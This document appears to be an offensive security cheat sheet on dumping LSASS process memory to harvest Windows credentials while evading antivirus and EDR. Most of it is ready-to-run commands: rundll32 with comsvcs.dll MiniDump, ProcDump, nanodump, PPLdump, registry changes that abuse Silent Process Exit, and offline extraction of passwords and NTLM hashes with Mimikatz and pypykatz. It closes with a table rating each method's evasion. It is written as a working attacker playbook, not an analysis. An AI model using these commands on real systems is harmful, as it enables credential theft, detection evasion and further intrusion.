LSASS Dump (Without Mimikatz)

Overview

LSASS (Local Security Authority Subsystem Service) holds credentials in memory. When Mimikatz is blocked by AV/EDR, use these alternatives to dump LSASS and extract credentials offline.

comsvcs.dll (LOLBIN)

Built-in Windows DLL. No download needed.

Find LSASS PID

tasklist | findstr lsass

Get-Process lsass | Select Id

Dump

rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump <PID> C:\Windows\Temp\lsass.dmp full

rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).Id C:\Windows\Temp\lsass.dmp full

Requires SeDebugPrivilege. Run from elevated prompt.

ProcDump (Sysinternals)

Microsoft-signed binary — often whitelisted by AV.

# Download
https://learn.microsoft.com/en-us/sysinternals/downloads/procdump

Dump

procdump.exe -accepteula -ma lsass.exe lsass.dmp

By PID

procdump.exe -accepteula -ma <PID> lsass.dmp

Task Manager (GUI)

If RDP access is available:

Open Task Manager
Details tab
Right-click lsass.exe → Create dump file
File saved to C:\Users\%USERNAME%\AppData\Local\Temp\lsass.DMP

Direct Syscalls — nanodump

Avoids API hooking by using direct syscalls. Effective against EDR.

https://github.com/helpsystems/nanodump

nanodump.exe -w lsass.dmp

PPLdump (Protected Process Light)

If LSASS runs as PPL (Protected Process Light):

https://github.com/itm4n/PPLdump

PPLdump.exe lsass.exe lsass.dmp

Silent Process Exit (Abuse Windows Error Reporting)

Configure WER to dump LSASS on “exit”:

reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\lsass.exe" /v GlobalFlag /t REG_DWORD /d 512
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\lsass.exe" /v ReportingMode /t REG_DWORD /d 1
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\lsass.exe" /v LocalDumpFolder /t REG_SZ /d "C:\Windows\Temp"

Extract Credentials from Dump (Attacker)

Mimikatz (Offline)

sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswords

pypykatz (Python — No Windows Needed)

pip3 install pypykatz
pypykatz lsa minidump lsass.dmp

Extract Only NTLM Hashes

pypykatz lsa minidump lsass.dmp -o hashes.txt

Quick Reference

Method	Needs Download	AV Evasion	Notes
comsvcs.dll	No	Medium	Built-in LOLBIN
ProcDump	Yes	High	Microsoft-signed
Task Manager	No	High	GUI only (RDP)
nanodump	Yes	Very High	Direct syscalls
PPLdump	Yes	High	Bypasses PPL

Documentation Index

​Overview

​comsvcs.dll (LOLBIN)

​Find LSASS PID

​Dump

​ProcDump (Sysinternals)

​Dump

​By PID

​Task Manager (GUI)

​Direct Syscalls — nanodump

​PPLdump (Protected Process Light)

​Silent Process Exit (Abuse Windows Error Reporting)

​Extract Credentials from Dump (Attacker)

​Mimikatz (Offline)

​pypykatz (Python — No Windows Needed)

​Extract Only NTLM Hashes

​Quick Reference

Overview

comsvcs.dll (LOLBIN)

Find LSASS PID

Dump

ProcDump (Sysinternals)

Dump

By PID

Task Manager (GUI)

Direct Syscalls — nanodump

PPLdump (Protected Process Light)

Silent Process Exit (Abuse Windows Error Reporting)

Extract Credentials from Dump (Attacker)

Mimikatz (Offline)

pypykatz (Python — No Windows Needed)

Extract Only NTLM Hashes

Quick Reference